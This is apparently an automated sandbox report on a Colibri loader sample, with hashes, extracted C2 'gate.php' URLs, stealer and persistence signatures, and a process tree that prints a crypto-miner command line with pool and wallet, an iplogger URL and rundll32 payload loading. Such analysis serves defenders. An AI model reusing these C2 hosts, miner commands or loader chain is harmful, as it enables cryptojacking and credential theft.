colibri | 31e2235fd61e64986d698dd1b8cb11c494b05d575886ccfcc437094735401e91

Analysis

max time kernel
147s
max time network
152s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
03-09-2022 13:00

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

533a75352e7692b34a28738a67915adf.exe
Size

602KB
MD5

533a75352e7692b34a28738a67915adf
SHA1

f58115604020a34ad5a3853c9e91f957fae3021a
SHA256

31e2235fd61e64986d698dd1b8cb11c494b05d575886ccfcc437094735401e91
SHA512

aff91444a99ca1663ffee7c42060e47bcd830b2acdc7791fb468fa581295c398c97fc7b63e2e38f0c85ae2c61bf831ec70fc3e49b8af5fce56eee33f7e73ba5b
SSDEEP

12288:8aHNwhpywQ4NNFNS1I5wWOXfVVIiOsTmddebmxNkV1GWcfAQwPStrWliGYQJo:N/fOLBGYQJ

Score

10^/10

colibri build1 discovery loader miner persistence spyware stealer

Malware Config

Extracted

Family

colibri

Version

1.2.0

Botnet

Build1

http://zpltcmgodhvvedxtfcygvbgjkvgvcguygytfigj.cc/gate.php

http://yugyuvyugguitgyuigtfyutdtoghghbbgyv.cx/gate.php

Signatures

Colibri Loader
A loader sold as MaaS first seen in August 2021.
loader colibri

Detectes Phoenix Miner Payload 2 IoCs

miner

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Roaming\MSEdge\svchost.exe	miner_phoenix
C:\Users\Admin\AppData\Roaming\MSEdge\svchost.exe	miner_phoenix

Downloads MZ/PE file

Executes dropped EXE 14 IoCs

Processes:

conhost.execonhost.exemsedge.exesvchost.exeM704729M6AFBL8F.exetmp2683.tmp.exetmp2683.tmp.exetmp2683.tmp.exeDF71H0IHHEA5CEF.exeGL6J12K6FCE0C62.exetmp3AB7.tmp.exetmp3AB7.tmp.exeIB6E85MCDIIHILD.exeLHD9M712BHMBIC1.exe

pid	process
4084	conhost.exe
4228	conhost.exe
4160	msedge.exe
4448	svchost.exe
4052	M704729M6AFBL8F.exe
5024	tmp2683.tmp.exe
1792	tmp2683.tmp.exe
1508	tmp2683.tmp.exe
2956	DF71H0IHHEA5CEF.exe
4944	GL6J12K6FCE0C62.exe
5004	tmp3AB7.tmp.exe
3304	tmp3AB7.tmp.exe
2256	IB6E85MCDIIHILD.exe
1852	LHD9M712BHMBIC1.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

M704729M6AFBL8F.exeDF71H0IHHEA5CEF.exeIB6E85MCDIIHILD.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	M704729M6AFBL8F.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	DF71H0IHHEA5CEF.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	IB6E85MCDIIHILD.exe

Loads dropped DLL 3 IoCs

Processes:

rundll32.exerundll32.exe

pid process

1508 rundll32.exe
60 rundll32.exe
60 rundll32.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

pid	process
1508	rundll32.exe
60	rundll32.exe
60	rundll32.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

533a75352e7692b34a28738a67915adf.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Windows\CurrentVersion\Run	533a75352e7692b34a28738a67915adf.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MSEdge = "C:\\Users\\Admin\\AppData\\Roaming\\MSEdge\\msedge.exe"	533a75352e7692b34a28738a67915adf.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

svchost.exe

pid process

4448 svchost.exe
4448 svchost.exe

pid	process
4448	svchost.exe
4448	svchost.exe

Suspicious use of SetThreadContext 5 IoCs

Processes:

conhost.exe533a75352e7692b34a28738a67915adf.exe533a75352e7692b34a28738a67915adf.exetmp2683.tmp.exetmp3AB7.tmp.exe

description	pid	process	target process
PID 4084 set thread context of 4228	4084	conhost.exe	conhost.exe
PID 888 set thread context of 4544	888	533a75352e7692b34a28738a67915adf.exe	533a75352e7692b34a28738a67915adf.exe
PID 4544 set thread context of 4764	4544	533a75352e7692b34a28738a67915adf.exe	533a75352e7692b34a28738a67915adf.exe
PID 1792 set thread context of 1508	1792	tmp2683.tmp.exe	tmp2683.tmp.exe
PID 5004 set thread context of 3304	5004	tmp3AB7.tmp.exe	tmp3AB7.tmp.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

4760 4944 WerFault.exe GL6J12K6FCE0C62.exe

pid	pid_target	process	target process
4760	4944	WerFault.exe	GL6J12K6FCE0C62.exe

Modifies Internet Explorer settings 1 TTPs 4 IoCs

adware spyware

Modify Registry

T1112

Processes:

LHD9M712BHMBIC1.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	LHD9M712BHMBIC1.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	LHD9M712BHMBIC1.exe
Key created	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Internet Explorer\IESettingSync	LHD9M712BHMBIC1.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2"	LHD9M712BHMBIC1.exe

Modifies registry class 1 IoCs

Processes:

IB6E85MCDIIHILD.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings IB6E85MCDIIHILD.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings	IB6E85MCDIIHILD.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

DF71H0IHHEA5CEF.exe

pid	process
2956	DF71H0IHHEA5CEF.exe
2956	DF71H0IHHEA5CEF.exe
2956	DF71H0IHHEA5CEF.exe
2956	DF71H0IHHEA5CEF.exe
2956	DF71H0IHHEA5CEF.exe
2956	DF71H0IHHEA5CEF.exe
2956	DF71H0IHHEA5CEF.exe
2956	DF71H0IHHEA5CEF.exe
2956	DF71H0IHHEA5CEF.exe
2956	DF71H0IHHEA5CEF.exe
2956	DF71H0IHHEA5CEF.exe
2956	DF71H0IHHEA5CEF.exe
2956	DF71H0IHHEA5CEF.exe
2956	DF71H0IHHEA5CEF.exe
2956	DF71H0IHHEA5CEF.exe
2956	DF71H0IHHEA5CEF.exe
2956	DF71H0IHHEA5CEF.exe
2956	DF71H0IHHEA5CEF.exe
2956	DF71H0IHHEA5CEF.exe
2956	DF71H0IHHEA5CEF.exe
2956	DF71H0IHHEA5CEF.exe
2956	DF71H0IHHEA5CEF.exe
2956	DF71H0IHHEA5CEF.exe
2956	DF71H0IHHEA5CEF.exe
2956	DF71H0IHHEA5CEF.exe
2956	DF71H0IHHEA5CEF.exe
2956	DF71H0IHHEA5CEF.exe
2956	DF71H0IHHEA5CEF.exe
2956	DF71H0IHHEA5CEF.exe
2956	DF71H0IHHEA5CEF.exe
2956	DF71H0IHHEA5CEF.exe
2956	DF71H0IHHEA5CEF.exe
2956	DF71H0IHHEA5CEF.exe
2956	DF71H0IHHEA5CEF.exe
2956	DF71H0IHHEA5CEF.exe
2956	DF71H0IHHEA5CEF.exe
2956	DF71H0IHHEA5CEF.exe
2956	DF71H0IHHEA5CEF.exe
2956	DF71H0IHHEA5CEF.exe
2956	DF71H0IHHEA5CEF.exe
2956	DF71H0IHHEA5CEF.exe
2956	DF71H0IHHEA5CEF.exe
2956	DF71H0IHHEA5CEF.exe
2956	DF71H0IHHEA5CEF.exe
2956	DF71H0IHHEA5CEF.exe
2956	DF71H0IHHEA5CEF.exe
2956	DF71H0IHHEA5CEF.exe
2956	DF71H0IHHEA5CEF.exe
2956	DF71H0IHHEA5CEF.exe
2956	DF71H0IHHEA5CEF.exe
2956	DF71H0IHHEA5CEF.exe
2956	DF71H0IHHEA5CEF.exe
2956	DF71H0IHHEA5CEF.exe
2956	DF71H0IHHEA5CEF.exe
2956	DF71H0IHHEA5CEF.exe
2956	DF71H0IHHEA5CEF.exe
2956	DF71H0IHHEA5CEF.exe
2956	DF71H0IHHEA5CEF.exe
2956	DF71H0IHHEA5CEF.exe
2956	DF71H0IHHEA5CEF.exe
2956	DF71H0IHHEA5CEF.exe
2956	DF71H0IHHEA5CEF.exe
2956	DF71H0IHHEA5CEF.exe
2956	DF71H0IHHEA5CEF.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

DF71H0IHHEA5CEF.exeM704729M6AFBL8F.exe

description pid process

Token: SeDebugPrivilege 2956 DF71H0IHHEA5CEF.exe
Token: SeDebugPrivilege 4052 M704729M6AFBL8F.exe
Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

LHD9M712BHMBIC1.exe

pid process

1852 LHD9M712BHMBIC1.exe
1852 LHD9M712BHMBIC1.exe

description	pid	process
Token: SeDebugPrivilege	2956	DF71H0IHHEA5CEF.exe
Token: SeDebugPrivilege	4052	M704729M6AFBL8F.exe

pid	process
1852	LHD9M712BHMBIC1.exe
1852	LHD9M712BHMBIC1.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

533a75352e7692b34a28738a67915adf.execonhost.exe533a75352e7692b34a28738a67915adf.exe533a75352e7692b34a28738a67915adf.execmd.exemsedge.exeM704729M6AFBL8F.exetmp2683.tmp.exetmp2683.tmp.exeDF71H0IHHEA5CEF.exetmp3AB7.tmp.exe

description	pid	process	target process
PID 888 wrote to memory of 4084	888	533a75352e7692b34a28738a67915adf.exe	conhost.exe
PID 888 wrote to memory of 4084	888	533a75352e7692b34a28738a67915adf.exe	conhost.exe
PID 888 wrote to memory of 4084	888	533a75352e7692b34a28738a67915adf.exe	conhost.exe
PID 4084 wrote to memory of 4228	4084	conhost.exe	conhost.exe
PID 4084 wrote to memory of 4228	4084	conhost.exe	conhost.exe
PID 4084 wrote to memory of 4228	4084	conhost.exe	conhost.exe
PID 888 wrote to memory of 4544	888	533a75352e7692b34a28738a67915adf.exe	533a75352e7692b34a28738a67915adf.exe
PID 888 wrote to memory of 4544	888	533a75352e7692b34a28738a67915adf.exe	533a75352e7692b34a28738a67915adf.exe
PID 888 wrote to memory of 4544	888	533a75352e7692b34a28738a67915adf.exe	533a75352e7692b34a28738a67915adf.exe
PID 4084 wrote to memory of 4228	4084	conhost.exe	conhost.exe
PID 4084 wrote to memory of 4228	4084	conhost.exe	conhost.exe
PID 4084 wrote to memory of 4228	4084	conhost.exe	conhost.exe
PID 4084 wrote to memory of 4228	4084	conhost.exe	conhost.exe
PID 888 wrote to memory of 4544	888	533a75352e7692b34a28738a67915adf.exe	533a75352e7692b34a28738a67915adf.exe
PID 888 wrote to memory of 4544	888	533a75352e7692b34a28738a67915adf.exe	533a75352e7692b34a28738a67915adf.exe
PID 888 wrote to memory of 4544	888	533a75352e7692b34a28738a67915adf.exe	533a75352e7692b34a28738a67915adf.exe
PID 888 wrote to memory of 4544	888	533a75352e7692b34a28738a67915adf.exe	533a75352e7692b34a28738a67915adf.exe
PID 888 wrote to memory of 4544	888	533a75352e7692b34a28738a67915adf.exe	533a75352e7692b34a28738a67915adf.exe
PID 888 wrote to memory of 4544	888	533a75352e7692b34a28738a67915adf.exe	533a75352e7692b34a28738a67915adf.exe
PID 888 wrote to memory of 4544	888	533a75352e7692b34a28738a67915adf.exe	533a75352e7692b34a28738a67915adf.exe
PID 4544 wrote to memory of 4764	4544	533a75352e7692b34a28738a67915adf.exe	533a75352e7692b34a28738a67915adf.exe
PID 4544 wrote to memory of 4764	4544	533a75352e7692b34a28738a67915adf.exe	533a75352e7692b34a28738a67915adf.exe
PID 4544 wrote to memory of 4764	4544	533a75352e7692b34a28738a67915adf.exe	533a75352e7692b34a28738a67915adf.exe
PID 4544 wrote to memory of 4764	4544	533a75352e7692b34a28738a67915adf.exe	533a75352e7692b34a28738a67915adf.exe
PID 4544 wrote to memory of 4764	4544	533a75352e7692b34a28738a67915adf.exe	533a75352e7692b34a28738a67915adf.exe
PID 4544 wrote to memory of 4764	4544	533a75352e7692b34a28738a67915adf.exe	533a75352e7692b34a28738a67915adf.exe
PID 4544 wrote to memory of 4764	4544	533a75352e7692b34a28738a67915adf.exe	533a75352e7692b34a28738a67915adf.exe
PID 4544 wrote to memory of 4764	4544	533a75352e7692b34a28738a67915adf.exe	533a75352e7692b34a28738a67915adf.exe
PID 4544 wrote to memory of 4764	4544	533a75352e7692b34a28738a67915adf.exe	533a75352e7692b34a28738a67915adf.exe
PID 4764 wrote to memory of 4104	4764	533a75352e7692b34a28738a67915adf.exe	cmd.exe
PID 4764 wrote to memory of 4104	4764	533a75352e7692b34a28738a67915adf.exe	cmd.exe
PID 4764 wrote to memory of 4104	4764	533a75352e7692b34a28738a67915adf.exe	cmd.exe
PID 4104 wrote to memory of 4160	4104	cmd.exe	msedge.exe
PID 4104 wrote to memory of 4160	4104	cmd.exe	msedge.exe
PID 4160 wrote to memory of 4448	4160	msedge.exe	svchost.exe
PID 4160 wrote to memory of 4448	4160	msedge.exe	svchost.exe
PID 4764 wrote to memory of 4052	4764	533a75352e7692b34a28738a67915adf.exe	M704729M6AFBL8F.exe
PID 4764 wrote to memory of 4052	4764	533a75352e7692b34a28738a67915adf.exe	M704729M6AFBL8F.exe
PID 4052 wrote to memory of 5024	4052	M704729M6AFBL8F.exe	tmp2683.tmp.exe
PID 4052 wrote to memory of 5024	4052	M704729M6AFBL8F.exe	tmp2683.tmp.exe
PID 4052 wrote to memory of 5024	4052	M704729M6AFBL8F.exe	tmp2683.tmp.exe
PID 5024 wrote to memory of 1792	5024	tmp2683.tmp.exe	tmp2683.tmp.exe
PID 5024 wrote to memory of 1792	5024	tmp2683.tmp.exe	tmp2683.tmp.exe
PID 5024 wrote to memory of 1792	5024	tmp2683.tmp.exe	tmp2683.tmp.exe
PID 1792 wrote to memory of 1508	1792	tmp2683.tmp.exe	tmp2683.tmp.exe
PID 1792 wrote to memory of 1508	1792	tmp2683.tmp.exe	tmp2683.tmp.exe
PID 1792 wrote to memory of 1508	1792	tmp2683.tmp.exe	tmp2683.tmp.exe
PID 1792 wrote to memory of 1508	1792	tmp2683.tmp.exe	tmp2683.tmp.exe
PID 1792 wrote to memory of 1508	1792	tmp2683.tmp.exe	tmp2683.tmp.exe
PID 1792 wrote to memory of 1508	1792	tmp2683.tmp.exe	tmp2683.tmp.exe
PID 1792 wrote to memory of 1508	1792	tmp2683.tmp.exe	tmp2683.tmp.exe
PID 4764 wrote to memory of 2956	4764	533a75352e7692b34a28738a67915adf.exe	DF71H0IHHEA5CEF.exe
PID 4764 wrote to memory of 2956	4764	533a75352e7692b34a28738a67915adf.exe	DF71H0IHHEA5CEF.exe
PID 4764 wrote to memory of 4944	4764	533a75352e7692b34a28738a67915adf.exe	GL6J12K6FCE0C62.exe
PID 4764 wrote to memory of 4944	4764	533a75352e7692b34a28738a67915adf.exe	GL6J12K6FCE0C62.exe
PID 2956 wrote to memory of 5004	2956	DF71H0IHHEA5CEF.exe	tmp3AB7.tmp.exe
PID 2956 wrote to memory of 5004	2956	DF71H0IHHEA5CEF.exe	tmp3AB7.tmp.exe
PID 2956 wrote to memory of 5004	2956	DF71H0IHHEA5CEF.exe	tmp3AB7.tmp.exe
PID 5004 wrote to memory of 3304	5004	tmp3AB7.tmp.exe	tmp3AB7.tmp.exe
PID 5004 wrote to memory of 3304	5004	tmp3AB7.tmp.exe	tmp3AB7.tmp.exe
PID 5004 wrote to memory of 3304	5004	tmp3AB7.tmp.exe	tmp3AB7.tmp.exe
PID 5004 wrote to memory of 3304	5004	tmp3AB7.tmp.exe	tmp3AB7.tmp.exe
PID 5004 wrote to memory of 3304	5004	tmp3AB7.tmp.exe	tmp3AB7.tmp.exe
PID 5004 wrote to memory of 3304	5004	tmp3AB7.tmp.exe	tmp3AB7.tmp.exe

C:\Users\Admin\AppData\Local\Temp\533a75352e7692b34a28738a67915adf.exe
"C:\Users\Admin\AppData\Local\Temp\533a75352e7692b34a28738a67915adf.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:888

C:\ProgramData\conhost.exe
"C:\ProgramData\conhost.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4084

C:\ProgramData\conhost.exe
"C:\ProgramData\conhost.exe"
3⤵
- Executes dropped EXE
PID:4228

C:\Users\Admin\AppData\Local\Temp\533a75352e7692b34a28738a67915adf.exe
"C:\Users\Admin\AppData\Local\Temp\533a75352e7692b34a28738a67915adf.exe"
2⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4544

C:\Users\Admin\AppData\Local\Temp\533a75352e7692b34a28738a67915adf.exe
"C:\Users\Admin\AppData\Local\Temp\533a75352e7692b34a28738a67915adf.exe"
3⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4764

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Roaming\MSEdge\msedge.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:4104

C:\Users\Admin\AppData\Roaming\MSEdge\msedge.exe
C:\Users\Admin\AppData\Roaming\MSEdge\msedge.exe
5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4160

C:\Users\Admin\AppData\Roaming\MSEdge\svchost.exe
-pool us-eth.2miners.com:2020 -wal 0x298a98736156cdffdfaf4580afc4966904f1e12e -worker ferma -epsw x -mode 1 -log 0 -mport 0 -etha 0 -ftime 55 -retrydelay 1 -coin eth
6⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4448

C:\Users\Admin\AppData\Local\Temp\M704729M6AFBL8F.exe
"C:\Users\Admin\AppData\Local\Temp\M704729M6AFBL8F.exe"
4⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4052

C:\Users\Admin\AppData\Local\Temp\tmp2683.tmp.exe
"C:\Users\Admin\AppData\Local\Temp\tmp2683.tmp.exe"
5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:5024

C:\Users\Admin\AppData\Local\Temp\tmp2683.tmp.exe
"C:\Users\Admin\AppData\Local\Temp\tmp2683.tmp.exe"
6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1792

C:\Users\Admin\AppData\Local\Temp\tmp2683.tmp.exe
"C:\Users\Admin\AppData\Local\Temp\tmp2683.tmp.exe"
7⤵
- Executes dropped EXE
PID:1508

C:\Users\Admin\AppData\Local\Temp\DF71H0IHHEA5CEF.exe
"C:\Users\Admin\AppData\Local\Temp\DF71H0IHHEA5CEF.exe"
4⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2956

C:\Users\Admin\AppData\Local\Temp\tmp3AB7.tmp.exe
"C:\Users\Admin\AppData\Local\Temp\tmp3AB7.tmp.exe"
5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:5004

C:\Users\Admin\AppData\Local\Temp\tmp3AB7.tmp.exe
"C:\Users\Admin\AppData\Local\Temp\tmp3AB7.tmp.exe"
6⤵
- Executes dropped EXE
PID:3304

C:\Users\Admin\AppData\Local\Temp\GL6J12K6FCE0C62.exe
"C:\Users\Admin\AppData\Local\Temp\GL6J12K6FCE0C62.exe"
4⤵
- Executes dropped EXE
PID:4944

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4944 -s 708
5⤵
- Program crash
PID:4760

C:\Users\Admin\AppData\Local\Temp\IB6E85MCDIIHILD.exe
"C:\Users\Admin\AppData\Local\Temp\IB6E85MCDIIHILD.exe"
4⤵
- Executes dropped EXE
- Checks computer location settings
- Modifies registry class
PID:2256

C:\Windows\SysWOW64\control.exe
"C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\SBJBM.CPL",
5⤵
PID:4140

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\SBJBM.CPL",
6⤵
- Loads dropped DLL
PID:1508

C:\Windows\system32\RunDll32.exe
C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\SBJBM.CPL",
7⤵
PID:3304

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\Admin\AppData\Local\Temp\SBJBM.CPL",
8⤵
- Loads dropped DLL
PID:60

C:\Users\Admin\AppData\Local\Temp\LHD9M712BHMBIC1.exe
https://iplogger.org/1QsEf7
4⤵
- Executes dropped EXE
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:1852

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 448 -p 4944 -ip 4944
1⤵
PID:4412

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Web Service

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\conhost.exe
Filesize
75KB

MD5
e0a68b98992c1699876f818a22b5b907

SHA1
d41e8ad8ba51217eb0340f8f69629ccb474484d0

SHA256
2b00d8c2bcc6b48e90524cdd41a07735dc94548ed41925baff86e43a61a4c37f

SHA512
856854f5fd89ae1669e4b2db10b73b4a78496bf80117003244c83e781f75e533e2e2bea9aa6c1b3aba3db1ed92ea0ed9755fbfd78cd6c86ba95867d07fc0ece2

Download Submit
C:\ProgramData\conhost.exe
Filesize
75KB

MD5
e0a68b98992c1699876f818a22b5b907

SHA1
d41e8ad8ba51217eb0340f8f69629ccb474484d0

SHA256
2b00d8c2bcc6b48e90524cdd41a07735dc94548ed41925baff86e43a61a4c37f

SHA512
856854f5fd89ae1669e4b2db10b73b4a78496bf80117003244c83e781f75e533e2e2bea9aa6c1b3aba3db1ed92ea0ed9755fbfd78cd6c86ba95867d07fc0ece2

Download Submit
C:\ProgramData\conhost.exe
Filesize
75KB

MD5
e0a68b98992c1699876f818a22b5b907

SHA1
d41e8ad8ba51217eb0340f8f69629ccb474484d0

SHA256
2b00d8c2bcc6b48e90524cdd41a07735dc94548ed41925baff86e43a61a4c37f

SHA512
856854f5fd89ae1669e4b2db10b73b4a78496bf80117003244c83e781f75e533e2e2bea9aa6c1b3aba3db1ed92ea0ed9755fbfd78cd6c86ba95867d07fc0ece2

Download Submit
C:\Users\Admin\AppData\Local\Temp\DF71H0IHHEA5CEF.exe
Filesize
456KB

MD5
ee30741a76c6c35fd4766b2fa48d63be

SHA1
db89a94dcd59a7fcae3ff068efc3fa00e8f3abbe

SHA256
5d5371581a8a41ad50e0d34e269ebbd17190c0e6b84526374c5455846387107c

SHA512
a3d2a5fae1108e5f070638d482f2e67f964b55a72373f0b87542edc0615d140205cc49439f543168e012a3574ae9ec3af2073909aaf90b653e7ff38cb16af975

Download Submit
C:\Users\Admin\AppData\Local\Temp\DF71H0IHHEA5CEF.exe
Filesize
456KB

MD5
ee30741a76c6c35fd4766b2fa48d63be

SHA1
db89a94dcd59a7fcae3ff068efc3fa00e8f3abbe

SHA256
5d5371581a8a41ad50e0d34e269ebbd17190c0e6b84526374c5455846387107c

SHA512
a3d2a5fae1108e5f070638d482f2e67f964b55a72373f0b87542edc0615d140205cc49439f543168e012a3574ae9ec3af2073909aaf90b653e7ff38cb16af975

Download Submit
C:\Users\Admin\AppData\Local\Temp\GL6J12K6FCE0C62.exe
Filesize
305KB

MD5
0d52a038018f8bf8cd91dacc4d3307d6

SHA1
37f37b3e998706ab530c1c9a80cbbfac823d605c

SHA256
d664762bc07e033a42f11964f7a086389bd6a8460a6a88f1dc30745b195d2799

SHA512
51ca7f2bcbf5b3a3b57ba102342d0f7c23b9cad09a5f00562cca5e285cf83736efc51344c04d5a8580a10e646a23df56222ccdb9d5dc37dfd26608ccc517260b

Download Submit
C:\Users\Admin\AppData\Local\Temp\GL6J12K6FCE0C62.exe
Filesize
305KB

MD5
0d52a038018f8bf8cd91dacc4d3307d6

SHA1
37f37b3e998706ab530c1c9a80cbbfac823d605c

SHA256
d664762bc07e033a42f11964f7a086389bd6a8460a6a88f1dc30745b195d2799

SHA512
51ca7f2bcbf5b3a3b57ba102342d0f7c23b9cad09a5f00562cca5e285cf83736efc51344c04d5a8580a10e646a23df56222ccdb9d5dc37dfd26608ccc517260b

Download Submit
C:\Users\Admin\AppData\Local\Temp\IB6E85MCDIIHILD.exe
Filesize
1.2MB

MD5
2d52952e6bf0bf4c78e0db6ad350cb3c

SHA1
75cb964419f53cca56a6f0829f7a2bd04c6bd8c8

SHA256
26afcf231653a0c74f711b79ddaf53f54dae8a8cfd38858e179f5b8642a4da60

SHA512
4ef6dfbe6876dd591e7c2d2ba5defc36d08d5f61f69bd76dd8f1e70b8b8a1a86bf9354fea6dc777eda25b9e1b757d10454348e6918b1e43558f501a690e6dd1a

Download Submit
C:\Users\Admin\AppData\Local\Temp\IB6E85MCDIIHILD.exe
Filesize
1.2MB

MD5
2d52952e6bf0bf4c78e0db6ad350cb3c

SHA1
75cb964419f53cca56a6f0829f7a2bd04c6bd8c8

SHA256
26afcf231653a0c74f711b79ddaf53f54dae8a8cfd38858e179f5b8642a4da60

SHA512
4ef6dfbe6876dd591e7c2d2ba5defc36d08d5f61f69bd76dd8f1e70b8b8a1a86bf9354fea6dc777eda25b9e1b757d10454348e6918b1e43558f501a690e6dd1a

Download Submit
C:\Users\Admin\AppData\Local\Temp\LHD9M712BHMBIC1.exe
Filesize
8KB

MD5
8719ce641e7c777ac1b0eaec7b5fa7c7

SHA1
c04de52cb511480cc7d00d67f1d9e17b02d6406b

SHA256
6283ac6ecbf4c4038cf44896dd221c7c11152bac77273709330409032c3e72ea

SHA512
7be5bd6d2342dd02818f1979e7e74a6376658711ac82a59b2af1a67207cfd3c7416b657af01216473b15132e4aa5c6675f0eb8ee6343192c7dfc4a5249ccaa97

Download Submit
C:\Users\Admin\AppData\Local\Temp\LHD9M712BHMBIC1.exe
Filesize
8KB

MD5
8719ce641e7c777ac1b0eaec7b5fa7c7

SHA1
c04de52cb511480cc7d00d67f1d9e17b02d6406b

SHA256
6283ac6ecbf4c4038cf44896dd221c7c11152bac77273709330409032c3e72ea

SHA512
7be5bd6d2342dd02818f1979e7e74a6376658711ac82a59b2af1a67207cfd3c7416b657af01216473b15132e4aa5c6675f0eb8ee6343192c7dfc4a5249ccaa97

Download Submit
C:\Users\Admin\AppData\Local\Temp\M704729M6AFBL8F.exe
Filesize
487KB

MD5
8dff0d3f99d12d37b665c9d8a8316a19

SHA1
f0bdaf7f749656907bb0861c715c1a818d78fd41

SHA256
34cdcd0ccda9ba7a51d1f6aaaa8a2a6d6c64f2fb58627a5f0b94d922be6adce1

SHA512
6ce36c92b7d6d52dd77383a9847f1bbf17af11a8a92da90efc8b6f6c1ab2b0985eea5983a553556d5a63e4b86d9b2711b870729557782bd0456e6fe10eb16464

Download Submit
C:\Users\Admin\AppData\Local\Temp\M704729M6AFBL8F.exe
Filesize
487KB

MD5
8dff0d3f99d12d37b665c9d8a8316a19

SHA1
f0bdaf7f749656907bb0861c715c1a818d78fd41

SHA256
34cdcd0ccda9ba7a51d1f6aaaa8a2a6d6c64f2fb58627a5f0b94d922be6adce1

SHA512
6ce36c92b7d6d52dd77383a9847f1bbf17af11a8a92da90efc8b6f6c1ab2b0985eea5983a553556d5a63e4b86d9b2711b870729557782bd0456e6fe10eb16464

Download Submit
C:\Users\Admin\AppData\Local\Temp\SBJBM.CPL
Filesize
1.4MB

MD5
0d252e0b9151f27dde3c1aafd5bfe86e

SHA1
b2987e440920b248907d6d98f17c091250d864ad

SHA256
2cee59d85b162709249a6a0f8a9da2bcc5ed0cab570dc82be42f9f3b24a4d70d

SHA512
438a87655ea510badf85a1970b9bd18e3fed074dc9de67278ff0652456ade29af7afa773c32551c24cf9aa04d804d716c414fd01d24905f8b5248a5e2d42d36c

Download Submit
